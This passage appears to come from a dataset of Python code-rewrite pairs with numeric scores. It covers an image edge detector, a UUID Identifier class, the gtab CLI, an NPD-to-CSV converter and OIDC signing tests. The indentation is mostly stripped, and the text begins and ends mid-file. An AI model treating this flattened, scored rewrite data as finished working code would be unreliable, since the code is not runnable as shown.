for y in range(1,height-1):
for x in range(1,width-1):
count += 1
avarageChangeR += abs(pix[x,y][0] - pix[x,y+1][0])
avarageChangeG += abs(pix[x,y][1] - pix[x,y+1][1])
avarageChangeB += abs(pix[x,y][2] - pix[x,y+1][2])
avarageChangeR = Mu*avarageChangeR/(2*count)
avarageChangeG = Mu*avarageChangeG/(2*count)
avarageChangeB = Mu*avarageChangeB/(2*count)
print("avarage Change",avarageChange)
for x in range(1,width-1):
for y in range(1,height-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > avarageChangeR:
changeArrey.append([x,y])
elif abs(pix[x,y][1] - pix[x,y+1][1]) > avarageChangeG:
changeArrey.append([x,y])
elif abs(pix[x,y][2] - pix[x,y+1][2]) > avarageChangeB:
changeArrey.append([x,y])
for y in range(1,height-1):
for x in range(1,width-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > avarageChangeR:
changeArrey.append([x,y])
elif abs(pix[x,y][1] - pix[x,y+1][1]) > avarageChangeG:
changeArrey.append([x,y])
elif abs(pix[x,y][2] - pix[x,y+1][2]) > avarageChangeB:
changeArrey.append([x,y])
avarageChange = avarageChange/height
for pix_cord in changeArrey:
x_cord = pix_cord[0]
y_cord = pix_cord[1]
pix[x_cord,y_cord] = BLACK
im.save('./result/alive_parrot.png') # Save the modified pixels as .png
''' | main.py | from PIL import Image
BLACK = (0,0,0)
WHITE = (255,255,255)
GREEN = (0,255,0)
RED = (255,0,0)
BLUE = (0,0,255)
"""
prcessImage - colors the edges of the image and saves it to the 'result' folder
@ARGS
path (utf string) - the path of the original image [ default - path to sample image ]
Mu (int) - we define the intensity with the 'mu' so if we set it higher it will only pick drastic changes [ default - 20 the optimal value ]
"""
def prcessImage( path = './sample-images/jpeg-home.jpeg', Mu = 20 ):
## We get the image and the load the pixels from it
im = Image.open(path) # Can be many different formats.
pix = im.load()
## Getting my image sizes
width = im.size[0]
height = im.size[1]
## Running from top to bottom of the image and changing the color of out picture to show predicted edges
for x in range(1,width-1):
for y in range(1,height-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][1] - pix[x,y+1][1]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][2] - pix[x,y+1][2]) > Mu:
pix[x,y] = GREEN
## Running from left to right of the image and changing the color of out picture to show predicted edges
for y in range(1,height-1):
for x in range(1,width-1):
if abs(pix[x,y][0] - pix[x+1,y][0]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][1] - pix[x+1,y][1]) > Mu:
pix[x,y] = GREEN
if abs(pix[x,y][2] - pix[x+1,y][2]) > Mu:
pix[x,y] = GREEN
## Saving the image so it can be loaded from main window
im.save('./result/result.jpg')
'''
exit() #Exit the program so the second method is not effecting
count = 0
avarageChangeR = 0
avarageChangeG = 0
avarageChangeB = 0
avarageChange = 0
changeArrey = []
for x in range(1,width-1):
for y in range(1,height-1):
count += 1
avarageChangeR += abs(pix[x,y][0] - pix[x,y+1][0])
avarageChangeG += abs(pix[x,y][1] - pix[x,y+1][1])
avarageChangeB += abs(pix[x,y][2] - pix[x,y+1][2])
for y in range(1,height-1):
for x in range(1,width-1):
count += 1
avarageChangeR += abs(pix[x,y][0] - pix[x,y+1][0])
avarageChangeG += abs(pix[x,y][1] - pix[x,y+1][1])
avarageChangeB += abs(pix[x,y][2] - pix[x,y+1][2])
avarageChangeR = Mu*avarageChangeR/(2*count)
avarageChangeG = Mu*avarageChangeG/(2*count)
avarageChangeB = Mu*avarageChangeB/(2*count)
print("avarage Change",avarageChange)
for x in range(1,width-1):
for y in range(1,height-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > avarageChangeR:
changeArrey.append([x,y])
elif abs(pix[x,y][1] - pix[x,y+1][1]) > avarageChangeG:
changeArrey.append([x,y])
elif abs(pix[x,y][2] - pix[x,y+1][2]) > avarageChangeB:
changeArrey.append([x,y])
for y in range(1,height-1):
for x in range(1,width-1):
if abs(pix[x,y][0] - pix[x,y+1][0]) > avarageChangeR:
changeArrey.append([x,y])
elif abs(pix[x,y][1] - pix[x,y+1][1]) > avarageChangeG:
changeArrey.append([x,y])
elif abs(pix[x,y][2] - pix[x,y+1][2]) > avarageChangeB:
changeArrey.append([x,y])
avarageChange = avarageChange/height
for pix_cord in changeArrey:
x_cord = pix_cord[0]
y_cord = pix_cord[1]
pix[x_cord,y_cord] = BLACK
im.save('./result/alive_parrot.png') # Save the modified pixels as .png
''' | 0.313 | 0.458106 |
from uuid import UUID
class Identifier:
def __init__(self, value: UUID) -> None:
self.value = value
def __eq__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value == other.value
if isinstance(self.value, type(other.value)):
return other.value == self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __ne__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value != other.value
if isinstance(self.value, type(other.value)):
return other.value != self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __lt__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value < other.value
if isinstance(self.value, type(other.value)):
return other.value > self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __le__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value <= other.value
if isinstance(self.value, type(other.value)):
return other.value >= self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __gt__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value > other.value
if isinstance(self.value, type(other.value)):
return other.value < self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __ge__(self, other: object) -> bool:
if isinstance(other, Identifier):
if isinstance(other, type(self)) or isinstance(self, type(other)):
if isinstance(other.value, type(self.value)):
return self.value >= other.value
if isinstance(self.value, type(other.value)):
return other.value <= self.value
return NotImplemented
return NotImplemented
return NotImplemented
def __hash__(self) -> int:
return hash(self.value)
def __str__(self) -> str:
return str(self.value) | src/fbsrankings/common/identifier.py | from uuid import UUID
class Identifier:
    """Immutable-style wrapper around a UUID supporting equality, ordering and hashing.

    Comparisons are only defined between identifiers related by subclassing
    (so two unrelated Identifier subclasses never compare equal even when the
    wrapped UUIDs match) and whose wrapped values are type-compatible.  Every
    operator returns NotImplemented otherwise, letting Python fall back to
    its default handling (e.g. identity for ==).
    """

    def __init__(self, value: UUID) -> None:
        self.value = value

    def _dispatch(self, other: object, forward, reverse):
        """Shared guard logic for all six rich comparisons.

        forward(a, b) computes ``self.value <op> other.value``; reverse is the
        mirrored operator, applied as ``reverse(other.value, self.value)`` when
        other.value's type is the more derived one, so the comparison is driven
        from that side (preserving any operator overrides on the subclass).
        Returns NotImplemented when the operands are not comparable.
        """
        if isinstance(other, Identifier):
            if isinstance(other, type(self)) or isinstance(self, type(other)):
                if isinstance(other.value, type(self.value)):
                    return forward(self.value, other.value)
                if isinstance(self.value, type(other.value)):
                    return reverse(other.value, self.value)
        return NotImplemented

    def __eq__(self, other: object) -> bool:
        return self._dispatch(other, lambda a, b: a == b, lambda a, b: a == b)

    def __ne__(self, other: object) -> bool:
        return self._dispatch(other, lambda a, b: a != b, lambda a, b: a != b)

    def __lt__(self, other: object) -> bool:
        return self._dispatch(other, lambda a, b: a < b, lambda a, b: a > b)

    def __le__(self, other: object) -> bool:
        return self._dispatch(other, lambda a, b: a <= b, lambda a, b: a >= b)

    def __gt__(self, other: object) -> bool:
        return self._dispatch(other, lambda a, b: a > b, lambda a, b: a < b)

    def __ge__(self, other: object) -> bool:
        return self._dispatch(other, lambda a, b: a >= b, lambda a, b: a <= b)

    def __hash__(self) -> int:
        # Hash delegates to the wrapped UUID so equal identifiers hash equal.
        return hash(self.value)

    def __str__(self) -> str:
        return str(self.value)
import argparse
import copy
import glob
import json
import os
from .core import GTAB
dir_path = os.path.dirname(os.path.abspath(__file__))
# --- UTILITY METHODS ---
class GroupedAction(argparse.Action):
    """argparse action that stores a value on a nested sub-namespace.

    A dest of the form "group.name" is split on the FIRST dot only and the
    parsed value is stored as ``namespace.<group>.<name>``, creating the
    sub-namespace on demand.  This lets flat command-line flags populate
    grouped config sections (e.g. --geo -> namespace.pytrends.geo).
    """

    def __call__(self, parser, namespace, values, option_string=None):
        # maxsplit=1: only the first dot separates group from field, so a
        # dotted field name cannot raise "too many values to unpack"
        # (the original used maxsplit=2, which breaks on "a.b.c" dests).
        group, dest = self.dest.split('.', 1)
        groupspace = getattr(namespace, group, argparse.Namespace())
        setattr(groupspace, dest, values)
        setattr(namespace, group, groupspace)
def _load_dir_cl():
# Load the persisted CLI state (working directory + active anchorbank name)
# from config/dir_cl.json stored next to this module.
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'r') as fp:
dir_cl = json.load(fp)
# An empty/whitespace-only path means 'init' was never run for this install.
if dir_cl['dir_cl'].strip() == "":
raise Exception("No active directory set! Must call 'init' first!")
# Echo the active anchorbank so the user can see what queries will use.
print(dir_cl['active_gtab'])
return dir_cl['dir_cl'], dir_cl['active_gtab']
# --- "EXPOSED" METHODS ---
def init_dir():
parser = argparse.ArgumentParser(prog='init_dir')
parser.add_argument("path", help="Path of the desired directory to be initialized/used.", type=str)
args = parser.parse_args()
path = os.path.abspath(args.path)
t = GTAB(path, from_cli=True)
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'w') as fp:
json.dump({"dir_cl": path, "active_gtab": "google_anchorbank_geo=_timeframe=2019-01-01 2020-08-01.tsv"}, fp,
indent=4, sort_keys=True)
print("Directory initialized!")
def print_options():
dir_cl, _ = _load_dir_cl()
print(f"Active directory is: {dir_cl}")
t = GTAB(dir_cl, from_cli=True)
t.print_options()
return None
def set_options():
parser = argparse.ArgumentParser(prog="set_options")
parser.add_argument("--geo", type=str, dest="pytrends.geo", action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--timeframe", type=str, dest='pytrends.timeframe', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--num_anchor_candidates", type=int, dest='gtab.num_anchor_candidates', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--num_anchors", type=int, dest='gtab.num_anchors', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--seed", type=int, dest='gtab.seed', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--sleep", type=float, dest='gtab.sleep', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--thresh_offline", type=int, dest='gtab.thresh_offline', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--backoff_factor", type=float, dest='conn.backoff_factor', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--proxies", type=str, dest='conn.proxies', action=GroupedAction, default=argparse.SUPPRESS,
nargs="+")
parser.add_argument("--retries", type=int, dest='conn.retries', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--timeout", type=int, dest='conn.timeout', action=GroupedAction, default=argparse.SUPPRESS,
nargs=2)
args = vars(parser.parse_args())
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_options(pytrends_config=vars(args.get('pytrends')) if args.get('pytrends') != None else None,
gtab_config=vars(args.get('gtab')) if args.get('gtab') != None else None,
conn_config=vars(args.get('conn')) if args.get('conn') != None else None,
overwite_file=True)
def set_blacklist():
parser = argparse.ArgumentParser(prog="set_blacklist")
parser.add_argument("blacklist", type=str, nargs='+')
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_blacklist(args.blacklist, overwrite_file=True)
def set_hitraffic():
parser = argparse.ArgumentParser(prog="set_hitraffic")
parser.add_argument("hitraffic", type=str, nargs='+')
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_hitraffic(args.hitraffic, overwrite_file=True)
def list_gtabs():
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.list_gtabs()
def rename_gtab():
parser = argparse.ArgumentParser(prog="rename_gtab")
parser.add_argument("src", type=str)
parser.add_argument("dst", type=str)
args = parser.parse_args()
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.rename_gtab(args.src, args.dst)
def delete_gtab():
parser = argparse.ArgumentParser(prog="delete_gtab")
parser.add_argument("src", type=str)
args = parser.parse_args()
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.delete_gtab(args.src)
def set_active_gtab():
parser = argparse.ArgumentParser(prog="set_active_gtab")
parser.add_argument("src", type=str)
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_active_gtab(args.src)
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'w') as fp:
json.dump({"dir_cl": dir_cl, "active_gtab": args.src}, fp, indent=4, sort_keys=True)
def create_gtab():
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.create_anchorbank(verbose=True)
def new_query():
dir_cl, active_gtab = _load_dir_cl()
parser = argparse.ArgumentParser(prog="new_query")
parser.add_argument("kws", type=str, nargs="+")
parser.add_argument("--results_file", type=str, default="query_results.json")
args = parser.parse_args()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() == "":
raise Exception("Must use 'gtab-set-active' first to select the active gtab!")
t.set_active_gtab(active_gtab)
rez = {}
for kw in args.kws:
t_rez = t.new_query(kw)
rez[kw] = copy.deepcopy(t_rez)
rez = json.loads(json.dumps(rez))
print(args.results_file)
os.makedirs(os.path.join(dir_cl, "query_results"), exist_ok=True)
with open(os.path.join(dir_cl, "query_results", args.results_file), 'w') as fp:
json.dump(rez, fp, indent=4) | gtab/command_line.py | import argparse
import copy
import glob
import json
import os
from .core import GTAB
dir_path = os.path.dirname(os.path.abspath(__file__))
# --- UTILITY METHODS ---
class GroupedAction(argparse.Action):
    """argparse action that stores a value on a nested sub-namespace.

    A dest of the form "group.name" is split on the FIRST dot only and the
    parsed value is stored as ``namespace.<group>.<name>``, creating the
    sub-namespace on demand.  This lets flat command-line flags populate
    grouped config sections (e.g. --geo -> namespace.pytrends.geo).
    """

    def __call__(self, parser, namespace, values, option_string=None):
        # maxsplit=1: only the first dot separates group from field, so a
        # dotted field name cannot raise "too many values to unpack"
        # (the original used maxsplit=2, which breaks on "a.b.c" dests).
        group, dest = self.dest.split('.', 1)
        groupspace = getattr(namespace, group, argparse.Namespace())
        setattr(groupspace, dest, values)
        setattr(namespace, group, groupspace)
def _load_dir_cl():
    """Read the persisted CLI state file and return (active_dir, active_gtab).

    Raises if no working directory has been initialised via 'init' yet; also
    echoes the currently active anchorbank name to stdout.
    """
    state_path = os.path.join(dir_path, "config", "dir_cl.json")
    with open(state_path, 'r') as state_file:
        state = json.load(state_file)
    active_dir = state['dir_cl']
    active_gtab = state['active_gtab']
    if active_dir.strip() == "":
        raise Exception("No active directory set! Must call 'init' first!")
    print(active_gtab)
    return active_dir, active_gtab
# --- "EXPOSED" METHODS ---
def init_dir():
parser = argparse.ArgumentParser(prog='init_dir')
parser.add_argument("path", help="Path of the desired directory to be initialized/used.", type=str)
args = parser.parse_args()
path = os.path.abspath(args.path)
t = GTAB(path, from_cli=True)
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'w') as fp:
json.dump({"dir_cl": path, "active_gtab": "google_anchorbank_geo=_timeframe=2019-01-01 2020-08-01.tsv"}, fp,
indent=4, sort_keys=True)
print("Directory initialized!")
def print_options():
dir_cl, _ = _load_dir_cl()
print(f"Active directory is: {dir_cl}")
t = GTAB(dir_cl, from_cli=True)
t.print_options()
return None
def set_options():
parser = argparse.ArgumentParser(prog="set_options")
parser.add_argument("--geo", type=str, dest="pytrends.geo", action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--timeframe", type=str, dest='pytrends.timeframe', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--num_anchor_candidates", type=int, dest='gtab.num_anchor_candidates', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--num_anchors", type=int, dest='gtab.num_anchors', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--seed", type=int, dest='gtab.seed', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--sleep", type=float, dest='gtab.sleep', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--thresh_offline", type=int, dest='gtab.thresh_offline', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--backoff_factor", type=float, dest='conn.backoff_factor', action=GroupedAction,
default=argparse.SUPPRESS)
parser.add_argument("--proxies", type=str, dest='conn.proxies', action=GroupedAction, default=argparse.SUPPRESS,
nargs="+")
parser.add_argument("--retries", type=int, dest='conn.retries', action=GroupedAction, default=argparse.SUPPRESS)
parser.add_argument("--timeout", type=int, dest='conn.timeout', action=GroupedAction, default=argparse.SUPPRESS,
nargs=2)
args = vars(parser.parse_args())
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_options(pytrends_config=vars(args.get('pytrends')) if args.get('pytrends') != None else None,
gtab_config=vars(args.get('gtab')) if args.get('gtab') != None else None,
conn_config=vars(args.get('conn')) if args.get('conn') != None else None,
overwite_file=True)
def set_blacklist():
parser = argparse.ArgumentParser(prog="set_blacklist")
parser.add_argument("blacklist", type=str, nargs='+')
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_blacklist(args.blacklist, overwrite_file=True)
def set_hitraffic():
parser = argparse.ArgumentParser(prog="set_hitraffic")
parser.add_argument("hitraffic", type=str, nargs='+')
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_hitraffic(args.hitraffic, overwrite_file=True)
def list_gtabs():
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.list_gtabs()
def rename_gtab():
parser = argparse.ArgumentParser(prog="rename_gtab")
parser.add_argument("src", type=str)
parser.add_argument("dst", type=str)
args = parser.parse_args()
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.rename_gtab(args.src, args.dst)
def delete_gtab():
parser = argparse.ArgumentParser(prog="delete_gtab")
parser.add_argument("src", type=str)
args = parser.parse_args()
dir_cl, active_gtab = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() != "":
t.set_active_gtab(active_gtab)
t.delete_gtab(args.src)
def set_active_gtab():
parser = argparse.ArgumentParser(prog="set_active_gtab")
parser.add_argument("src", type=str)
args = parser.parse_args()
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.set_active_gtab(args.src)
with open(os.path.join(dir_path, "config", "dir_cl.json"), 'w') as fp:
json.dump({"dir_cl": dir_cl, "active_gtab": args.src}, fp, indent=4, sort_keys=True)
def create_gtab():
dir_cl, _ = _load_dir_cl()
t = GTAB(dir_cl, from_cli=True)
t.create_anchorbank(verbose=True)
def new_query():
dir_cl, active_gtab = _load_dir_cl()
parser = argparse.ArgumentParser(prog="new_query")
parser.add_argument("kws", type=str, nargs="+")
parser.add_argument("--results_file", type=str, default="query_results.json")
args = parser.parse_args()
t = GTAB(dir_cl, from_cli=True)
if active_gtab.strip() == "":
raise Exception("Must use 'gtab-set-active' first to select the active gtab!")
t.set_active_gtab(active_gtab)
rez = {}
for kw in args.kws:
t_rez = t.new_query(kw)
rez[kw] = copy.deepcopy(t_rez)
rez = json.loads(json.dumps(rez))
print(args.results_file)
os.makedirs(os.path.join(dir_cl, "query_results"), exist_ok=True)
with open(os.path.join(dir_cl, "query_results", args.results_file), 'w') as fp:
json.dump(rez, fp, indent=4) | 0.327883 | 0.091342 |
import npd
import utilities
import csv
def format_data(input_path: str, output_directory: str, entries: dict):
csv_data = {}
for key in entries:
csv_data[key] = []
with open(input_path, "r") as file:
line_total = len(file.readlines())
with open(input_path, "r") as file:
for line_count in range(line_total):
line = npd.Line(file.readline())
for key, (id, separators) in entries.items():
# Check if line is valid entry.
if line.has_id(id) and line.get_data_count() >= 3:
# Convert the line into an entry.
entry = npd.Entry(id, separators, line)
# Get data and timestamp from entry.
data = entry.get_data()
timestamp = npd.Timestamp(entry.get_time())
# Add time and epoch to data.
data.insert(0, timestamp.get_epoch())
data.insert(0, timestamp.get_time())
# Add data to dictionary.
csv_data[key].append(data)
utilities.progress_bar(line_count / line_total * 100)
# Save data.
print()
for key, rows in csv_data.items():
print("{0}: {1},{2}".format(key, len(rows), len(rows[0])))
input_file = input_path.split("/")[-1].split(".")[0]
output_path = output_directory + "/" + input_file + "-" + key + ".csv"
# Write to csv.
with open(output_path, 'w', newline='') as file:
writer = csv.writer(file, delimiter=',')
for row in rows:
writer.writerow(row)
def main():
path = "./Data/20210122_100221_G.NPD"
output_directory = "./Output"
entries = {
# Title: ( ID, Separators )
"Vessel-GPS" : ( "R44 0", [" ", ","] ),
"Vessel-Gyrocompass" : ( "R104 3", [" ", ","] ),
"ROV-Gyrocompass" : ( "R132 4", [" ", ","] ),
"ROV-HPR" : ( "R496 10", [" ", ","] ),
"ROV-HiPAP-HPR" : ( "P D 3", [" ", " "] ),
"ROV-Digiquartz" : ( "D 3 19 1", [" ", " ", " "] ),
}
format_data(path, output_directory, entries)
if __name__ == "__main__":
main() | Python/format_npd.py | import npd
import utilities
import csv
def format_data(input_path: str, output_directory: str, entries: dict):
    """Parse an NPD capture and write one CSV per entry type.

    Arguments:
        input_path: path to the .NPD source file.
        output_directory: folder that receives the generated CSV files.
        entries: maps a CSV title to (record_id, separators) used to
            recognise and tokenise matching lines.
    """
    csv_data = {key: [] for key in entries}
    # Read the file once; the original opened it a second time solely to
    # count lines for the progress bar.
    with open(input_path, "r") as file:
        lines = file.readlines()
    line_total = len(lines)
    for line_count, raw in enumerate(lines):
        line = npd.Line(raw)
        for key, (entry_id, separators) in entries.items():
            # A usable record carries the entry id and at least 3 data fields.
            if line.has_id(entry_id) and line.get_data_count() >= 3:
                # Convert the line into an entry.
                entry = npd.Entry(entry_id, separators, line)
                data = entry.get_data()
                timestamp = npd.Timestamp(entry.get_time())
                # Prepend epoch, then time, so rows start [time, epoch, ...].
                data.insert(0, timestamp.get_epoch())
                data.insert(0, timestamp.get_time())
                csv_data[key].append(data)
        utilities.progress_bar(line_count / line_total * 100)
    # Save data.
    print()
    input_file = input_path.split("/")[-1].split(".")[0]
    for key, rows in csv_data.items():
        # Guard: the original indexed rows[0] unconditionally and crashed
        # with IndexError whenever a section matched no lines.
        width = len(rows[0]) if rows else 0
        print("{0}: {1},{2}".format(key, len(rows), width))
        output_path = output_directory + "/" + input_file + "-" + key + ".csv"
        # Write to csv.
        with open(output_path, 'w', newline='') as file:
            writer = csv.writer(file, delimiter=',')
            writer.writerows(rows)
def main():
# Hard-coded demo inputs: one recorded NPD capture and the output folder.
path = "./Data/20210122_100221_G.NPD"
output_directory = "./Output"
# Title -> (record ID, separator sequence) for each sensor stream to
# extract; the separators tokenise that record's payload in order.
entries = {
# Title: ( ID, Separators )
"Vessel-GPS" : ( "R44 0", [" ", ","] ),
"Vessel-Gyrocompass" : ( "R104 3", [" ", ","] ),
"ROV-Gyrocompass" : ( "R132 4", [" ", ","] ),
"ROV-HPR" : ( "R496 10", [" ", ","] ),
"ROV-HiPAP-HPR" : ( "P D 3", [" ", " "] ),
"ROV-Digiquartz" : ( "D 3 19 1", [" ", " ", " "] ),
}
format_data(path, output_directory, entries)
if __name__ == "__main__":
main() | 0.407687 | 0.277069 |
import os
import time
from cryptojwt.jws import factory
from oidcmsg.key_jar import KeyJar
from oidcmsg.oidc import RegistrationRequest
from fedoidcmsg.signing_service import InternalSigningService
from fedoidcmsg.signing_service import WebSigningServiceClient
from fedoidcmsg.signing_service import make_internal_signing_service
from fedoidcmsg.signing_service import make_signing_service
from fedoidcmsg.test_utils import create_keyjars
KEYDEFS = [
{"type": "RSA", "key": '', "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]}
]
_path = os.path.realpath(__file__)
root_dir, _fname = os.path.split(_path)
KJ = create_keyjars(['https://swamid.sunet.se', 'https://sunet.se',
'https://op.sunet.se'], KEYDEFS, root_dir=root_dir)
class Response(object):
# Minimal stand-in for an HTTP response object, carrying just the three
# attributes the tests construct it with; presumably parse_response reads
# these — confirm against WebSigningServiceClient.
def __init__(self, status_code, text, headers):
self.status_code = status_code
self.text = text
self.headers = headers
def test_make_internal_signing_service():
config = {
'private_path': '{}/private/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
}
signing_service = make_internal_signing_service(config,
'https://swamid.sunet.se')
assert signing_service.iss == 'https://swamid.sunet.se'
assert len(signing_service.keyjar.issuer_keys['']) == 1
assert len(signing_service.keyjar.issuer_keys[''][0]) == 2
def test_make_web_signing_service():
config = {
'type': 'web',
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'iss': 'https://swamid.sunet.se',
'url': 'https://swamid.sunet.se/mdss'
}
signing_service = make_signing_service(config, 'https://example.com')
assert signing_service.eid == 'https://example.com'
assert signing_service.iss == 'https://swamid.sunet.se'
assert signing_service.url == 'https://swamid.sunet.se/mdss'
assert len(signing_service.keyjar.issuer_keys[
'https://swamid.sunet.se']) == 1
assert len(signing_service.keyjar.issuer_keys[
'https://swamid.sunet.se'][0]) == 2
def test_internal_signing_service():
iss = InternalSigningService('https://swamid.sunet.se',
KJ['https://swamid.sunet.se'])
res = iss.sign(
RegistrationRequest(redirect_uris=['https://example.com/rp/cb']),
receiver='https://example.com/rp'
)
_jws = factory(res)
assert _jws.jwt.headers['alg'] == 'RS256'
msg = _jws.jwt.payload()
assert msg['iss'] == 'https://swamid.sunet.se'
assert msg['aud'] == ['https://example.com/rp']
def test_web_signing_service():
_kj = KJ['https://swamid.sunet.se']
iss = InternalSigningService('https://swamid.sunet.se', _kj)
_sms = iss.create(
RegistrationRequest(redirect_uris=['https://example.com/rp/cb']),
'https://example.com/rp'
)
_jwks = _kj.export_jwks()
_vkj = KeyJar()
_vkj.import_jwks(_jwks, 'https://swamid.sunet.se')
wss = WebSigningServiceClient('https://swamid.sunet.se',
'https://swamid.sunet.se/mdss',
'https://example.com/rp', _vkj)
response = Response(200, _sms,
{'Location': 'https://swamid.sunet.se/mdss/abcdefg'})
_res = wss.parse_response(response)
assert set(_res.keys()) == {'sms', 'loc'}
def test_key_rotation():
config = {
'private_path': '{}/private/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
}
signing_service = make_internal_signing_service(config,
'https://swamid.sunet.se')
signing_service.keyconf = KEYDEFS
signing_service.remove_after = 1
signing_service.rotate_keys()
assert len(signing_service.keyjar.get_issuer_keys('')) == 4
time.sleep(1)
signing_service.rotate_keys()
assert len(signing_service.keyjar.get_issuer_keys('')) == 4 | tests/test_05_signing_service.py | import os
import time
from cryptojwt.jws import factory
from oidcmsg.key_jar import KeyJar
from oidcmsg.oidc import RegistrationRequest
from fedoidcmsg.signing_service import InternalSigningService
from fedoidcmsg.signing_service import WebSigningServiceClient
from fedoidcmsg.signing_service import make_internal_signing_service
from fedoidcmsg.signing_service import make_signing_service
from fedoidcmsg.test_utils import create_keyjars
KEYDEFS = [
{"type": "RSA", "key": '', "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]}
]
_path = os.path.realpath(__file__)
root_dir, _fname = os.path.split(_path)
KJ = create_keyjars(['https://swamid.sunet.se', 'https://sunet.se',
'https://op.sunet.se'], KEYDEFS, root_dir=root_dir)
class Response(object):
    """Minimal stand-in for an HTTP response used by the tests below.

    Carries only the status code, body text and header mapping it is
    constructed with.
    """

    def __init__(self, status_code, text, headers):
        # Store the three fields verbatim; no validation is performed.
        self.status_code, self.text, self.headers = status_code, text, headers
def test_make_internal_signing_service():
config = {
'private_path': '{}/private/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
}
signing_service = make_internal_signing_service(config,
'https://swamid.sunet.se')
assert signing_service.iss == 'https://swamid.sunet.se'
assert len(signing_service.keyjar.issuer_keys['']) == 1
assert len(signing_service.keyjar.issuer_keys[''][0]) == 2
def test_make_web_signing_service():
config = {
'type': 'web',
'public_path': '{}/public/https%3A%2F%2Fswamid.sunet.se'.format(
root_dir),
'iss': 'https://swamid.sunet.se',
'url': 'https://swamid.sunet.se/mdss'
}
signing_service = make_signing_service(config, 'https://example.com')
assert signing_service.eid == 'https://example.com'
assert signing_service.iss == 'https://swamid.sunet.se'
assert signing_service.url == 'https://swamid.sunet.se/mdss'
assert len(signing_service.keyjar.issuer_keys[
'https://swamid.sunet.se']) == 1
assert len(signing_service.keyjar.issuer_keys[
'https://swamid.sunet.se'][0]) == 2
def test_internal_signing_service():
iss = InternalSigningService('https://swamid.sunet.se',
KJ['https://swamid.sunet.se'])
res = iss.sign(
